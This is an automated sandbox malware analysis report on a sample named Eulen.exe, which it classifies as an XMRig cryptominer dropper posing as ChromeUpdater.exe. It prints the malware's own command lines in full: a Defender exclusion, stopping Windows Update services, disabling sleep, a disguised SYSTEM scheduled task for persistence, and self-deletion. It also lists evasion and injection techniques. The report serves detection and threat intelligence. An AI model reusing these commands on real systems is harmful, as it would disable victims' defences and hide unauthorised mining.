Edit tour

Windows Analysis Report
Eulen.exe

Overview

General Information

Sample name:	Eulen.exe
Analysis ID:	1551907
MD5:	f8dd965fe02f49c93f22972470d480b3
SHA1:	859b8399768955c861037b246ca458e847041622
SHA256:	acbae9fb2fe0b90eb94c09bc11726a544ffd22fb5ed20f4477227979e88fdc7d
Tags:	exeuser-likeastar20
Infos:

Detection

Xmrig

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Stop multiple services

Yara detected Xmrig cryptocurrency miner

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Allocates memory in foreign processes

Contains functionality to compare user and computer (likely to detect sandboxes)

Contains functionality to inject code into remote processes

Creates a thread in another existing process (thread injection)

Found direct / indirect Syscall (likely to bypass EDR)

Found hidden mapped module (file has been removed from disk)

Hooks files or directories query functions (used to hide files and directories)

Hooks processes query functions (used to hide processes)

Hooks registry keys query functions (used to hide registry keys)

Injects a PE file into a foreign processes

Injects code into the Windows Explorer (explorer.exe)

Installs new ROOT certificates

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Maps a DLL or memory area into another process

Modifies power options to not sleep / hibernate

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

PE file contains section with special chars

Protects its processes via BreakOnTermination flag

Query firmware table information (likely to detect VMs)

Sample is not signed and drops a device driver

Self deletion via cmd or bat file

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Stops critical windows services

Suspicious powershell command line found

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Tries to evade analysis by execution special instruction (VM detection)

Uses powercfg.exe to modify the power settings

Writes to foreign memory regions

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates driver files

Deletes files inside the Windows folder

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (may stop execution after accessing registry keys)

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

May sleep (evasive loops) to hinder dynamic analysis

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Powershell Defender Exclusion

Sigma detected: Uncommon Svchost Parent Process

Stores large binary data to the registry

Suricata IDS alerts with low severity for network traffic

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w10x64

Eulen.exe (PID: 7588 cmdline: "C:\Users\user\Desktop\Eulen.exe" MD5: F8DD965FE02F49C93F22972470D480B3)

dialer.exe (PID: 8080 cmdline: C:\Windows\System32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)

winlogon.exe (PID: 556 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)

lsass.exe (PID: 640 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)

svchost.exe (PID: 920 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

dwm.exe (PID: 984 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)

svchost.exe (PID: 364 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 372 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 772 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 888 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 660 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

ChromeUpdater.exe (PID: 6772 cmdline: "C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe" MD5: F8DD965FE02F49C93F22972470D480B3)

svchost.exe (PID: 1044 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1200 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1224 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1352 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1392 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1404 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1412 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1476 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1596 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1648 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1704 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1716 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1740 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1800 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

Conhost.exe (PID: 7760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 8012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7708 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7936 cmdline: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 7984 cmdline: sc stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 8000 cmdline: sc stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 8016 cmdline: sc stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 8032 cmdline: sc stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 8048 cmdline: sc stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

cmd.exe (PID: 8064 cmdline: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powercfg.exe (PID: 8156 cmdline: powercfg /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

powercfg.exe (PID: 5916 cmdline: powercfg /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

powercfg.exe (PID: 1448 cmdline: powercfg /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

powercfg.exe (PID: 4320 cmdline: powercfg /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

powershell.exe (PID: 8116 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#gymatom#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 8124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 5836 cmdline: C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\Eulen.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

choice.exe (PID: 1496 cmdline: choice /C Y /N /D Y /T 3 MD5: 1A9804F0C374283B094E9E55DC5EE128)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
xmrig	According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.	No Attribution	https://gridinsoft.com/xmrig https://www.akamai.com/blog/security-research/2024-php-exploit-cve-one-day-after-disclosure https://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Windows\Temp\auqpbnqlvfdv.tmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
C:\Windows\Temp\auqpbnqlvfdv.tmp	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x4cb268:$a1: mining.set_target 0x4c6a48:$a2: XMRIG_HOSTNAME 0x4c8540:$a3: Usage: xmrig [OPTIONS] 0x4c6a20:$a4: XMRIG_VERSION
C:\Windows\Temp\auqpbnqlvfdv.tmp	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x4d1241:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
C:\Windows\Temp\auqpbnqlvfdv.tmp	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x4d17a0:$s1: %s/%s (Windows NT %lu.%lu 0x4d1fc8:$s3: \\.\WinRing0_ 0x4ca4c8:$s4: pool_wallet 0x4c62d0:$s5: cryptonight 0x4c62e0:$s5: cryptonight 0x4c62f0:$s5: cryptonight 0x4c6300:$s5: cryptonight 0x4c6318:$s5: cryptonight 0x4c6328:$s5: cryptonight 0x4c6338:$s5: cryptonight 0x4c6350:$s5: cryptonight 0x4c6360:$s5: cryptonight 0x4c6378:$s5: cryptonight 0x4c6390:$s5: cryptonight 0x4c63a0:$s5: cryptonight 0x4c63b0:$s5: cryptonight 0x4c63c0:$s5: cryptonight 0x4c63d8:$s5: cryptonight 0x4c63f0:$s5: cryptonight 0x4c6400:$s5: cryptonight 0x4c6410:$s5: cryptonight

Memory Dumps

Source	Rule	Description	Author	Strings
00000027.00000002.1776062016.00007FF609F4D000.00000004.00000001.01000000.00000009.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000027.00000002.1776062016.00007FF609F4D000.00000004.00000001.01000000.00000009.sdmp	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x60bc08:$a1: mining.set_target 0x6073e8:$a2: XMRIG_HOSTNAME 0x608ee0:$a3: Usage: xmrig [OPTIONS] 0x6073c0:$a4: XMRIG_VERSION

Unpacked PEs

Source	Rule	Description	Author	Strings
39.2.ChromeUpdater.exe.7ff60a08d9a0.10.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
39.2.ChromeUpdater.exe.7ff60a08d9a0.10.raw.unpack	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x4cb268:$a1: mining.set_target 0x4c6a48:$a2: XMRIG_HOSTNAME 0x4c8540:$a3: Usage: xmrig [OPTIONS] 0x4c6a20:$a4: XMRIG_VERSION
39.2.ChromeUpdater.exe.7ff60a08d9a0.10.raw.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x4d1241:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
39.2.ChromeUpdater.exe.7ff60a08d9a0.10.raw.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x4d17a0:$s1: %s/%s (Windows NT %lu.%lu 0x4d1fc8:$s3: \\.\WinRing0_ 0x4ca4c8:$s4: pool_wallet 0x4c62d0:$s5: cryptonight 0x4c62e0:$s5: cryptonight 0x4c62f0:$s5: cryptonight 0x4c6300:$s5: cryptonight 0x4c6318:$s5: cryptonight 0x4c6328:$s5: cryptonight 0x4c6338:$s5: cryptonight 0x4c6350:$s5: cryptonight 0x4c6360:$s5: cryptonight 0x4c6378:$s5: cryptonight 0x4c6390:$s5: cryptonight 0x4c63a0:$s5: cryptonight 0x4c63b0:$s5: cryptonight 0x4c63c0:$s5: cryptonight 0x4c63d8:$s5: cryptonight 0x4c63f0:$s5: cryptonight 0x4c6400:$s5: cryptonight 0x4c6410:$s5: cryptonight
39.2.ChromeUpdater.exe.7ff60a0684a0.7.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
39.2.ChromeUpdater.exe.7ff60a0684a0.7.raw.unpack	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x4f0768:$a1: mining.set_target 0x4ebf48:$a2: XMRIG_HOSTNAME 0x4eda40:$a3: Usage: xmrig [OPTIONS] 0x4ebf20:$a4: XMRIG_VERSION
39.2.ChromeUpdater.exe.7ff60a0684a0.7.raw.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x4f6741:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
39.2.ChromeUpdater.exe.7ff60a0684a0.7.raw.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x4f6ca0:$s1: %s/%s (Windows NT %lu.%lu 0x4f74c8:$s3: \\.\WinRing0_ 0x4ef9c8:$s4: pool_wallet 0x4eb7d0:$s5: cryptonight 0x4eb7e0:$s5: cryptonight 0x4eb7f0:$s5: cryptonight 0x4eb800:$s5: cryptonight 0x4eb818:$s5: cryptonight 0x4eb828:$s5: cryptonight 0x4eb838:$s5: cryptonight 0x4eb850:$s5: cryptonight 0x4eb860:$s5: cryptonight 0x4eb878:$s5: cryptonight 0x4eb890:$s5: cryptonight 0x4eb8a0:$s5: cryptonight 0x4eb8b0:$s5: cryptonight 0x4eb8c0:$s5: cryptonight 0x4eb8d8:$s5: cryptonight 0x4eb8f0:$s5: cryptonight 0x4eb900:$s5: cryptonight 0x4eb910:$s5: cryptonight
39.2.ChromeUpdater.exe.7ff60a08a0c0.8.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
39.2.ChromeUpdater.exe.7ff60a08a0c0.8.raw.unpack	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x4ceb48:$a1: mining.set_target 0x4ca328:$a2: XMRIG_HOSTNAME 0x4cbe20:$a3: Usage: xmrig [OPTIONS] 0x4ca300:$a4: XMRIG_VERSION
39.2.ChromeUpdater.exe.7ff60a08a0c0.8.raw.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x4d4b21:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
39.2.ChromeUpdater.exe.7ff60a08a0c0.8.raw.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x4d5080:$s1: %s/%s (Windows NT %lu.%lu 0x4d58a8:$s3: \\.\WinRing0_ 0x4cdda8:$s4: pool_wallet 0x4c9bb0:$s5: cryptonight 0x4c9bc0:$s5: cryptonight 0x4c9bd0:$s5: cryptonight 0x4c9be0:$s5: cryptonight 0x4c9bf8:$s5: cryptonight 0x4c9c08:$s5: cryptonight 0x4c9c18:$s5: cryptonight 0x4c9c30:$s5: cryptonight 0x4c9c40:$s5: cryptonight 0x4c9c58:$s5: cryptonight 0x4c9c70:$s5: cryptonight 0x4c9c80:$s5: cryptonight 0x4c9c90:$s5: cryptonight 0x4c9ca0:$s5: cryptonight 0x4c9cb8:$s5: cryptonight 0x4c9cd0:$s5: cryptonight 0x4c9ce0:$s5: cryptonight 0x4c9cf0:$s5: cryptonight
39.2.ChromeUpdater.exe.7ff60a08d9a0.10.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
39.2.ChromeUpdater.exe.7ff60a08d9a0.10.unpack	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x4ca268:$a1: mining.set_target 0x4c5a48:$a2: XMRIG_HOSTNAME 0x4c7540:$a3: Usage: xmrig [OPTIONS] 0x4c5a20:$a4: XMRIG_VERSION
39.2.ChromeUpdater.exe.7ff60a08d9a0.10.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x4d0241:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
39.2.ChromeUpdater.exe.7ff60a08d9a0.10.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x4d07a0:$s1: %s/%s (Windows NT %lu.%lu 0x4d0fc8:$s3: \\.\WinRing0_ 0x4c94c8:$s4: pool_wallet 0x4c52d0:$s5: cryptonight 0x4c52e0:$s5: cryptonight 0x4c52f0:$s5: cryptonight 0x4c5300:$s5: cryptonight 0x4c5318:$s5: cryptonight 0x4c5328:$s5: cryptonight 0x4c5338:$s5: cryptonight 0x4c5350:$s5: cryptonight 0x4c5360:$s5: cryptonight 0x4c5378:$s5: cryptonight 0x4c5390:$s5: cryptonight 0x4c53a0:$s5: cryptonight 0x4c53b0:$s5: cryptonight 0x4c53c0:$s5: cryptonight 0x4c53d8:$s5: cryptonight 0x4c53f0:$s5: cryptonight 0x4c5400:$s5: cryptonight 0x4c5410:$s5: cryptonight
Click to see the 11 entries

Sigma Signatures

Operating System Destruction

Sigma detected: Stop multiple services

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, CommandLine: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, ProcessId: 7936, ProcessName: cmd.exe

System Summary

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Source: Process started

Author: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#gymatom#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#gymatom#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }, CommandLine|base64offset|contains: [, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#gymatom#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }, ProcessId: 8116, ProcessName: powershell.exe

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Source: Process started

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, ProcessId: 7708, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\System32\dialer.exe, ParentImage: C:\Windows\System32\dialer.exe, ParentProcessId: 8080, ParentProcessName: dialer.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 920, ProcessName: svchost.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, ProcessId: 7708, ProcessName: powershell.exe

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-08T11:28:39.498296+0100	2022930	1	A Network Trojan was detected	20.109.210.53	443	192.168.2.8	49708	TCP
2024-11-08T11:29:17.533159+0100	2022930	1	A Network Trojan was detected	20.109.210.53	443	192.168.2.8	49711	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Eulen.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	Avira: detection malicious, Label: HEUR/AGEN.1325655
Source: C:\Users\user\AppData\Local\Temp\auqpbnqlvfdv.tmp	Avira: detection malicious, Label: HEUR/AGEN.1362795

Multi AV Scanner detection for dropped file

Source: C:\Program Files\Google\Chrome\Application\ChromeUpdater.exe	ReversingLabs: Detection: 15%
Source: C:\Users\user\AppData\Local\Temp\auqpbnqlvfdv.tmp	ReversingLabs: Detection: 91%
Source: C:\Windows\Temp\auqpbnqlvfdv.tmp	ReversingLabs: Detection: 70%

Multi AV Scanner detection for submitted file

Source: Eulen.exe

ReversingLabs: Detection: 15%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\auqpbnqlvfdv.tmp	Joe Sandbox ML: detected
Source: C:\Windows\Temp\auqpbnqlvfdv.tmp	Joe Sandbox ML: detected

Bitcoin Miner

Yara detected Xmrig cryptocurrency miner

Source: Yara match	File source: 39.2.ChromeUpdater.exe.7ff60a08d9a0.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.ChromeUpdater.exe.7ff60a0684a0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.ChromeUpdater.exe.7ff60a08a0c0.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.ChromeUpdater.exe.7ff60a08d9a0.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000027.00000002.1776062016.00007FF609F4D000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
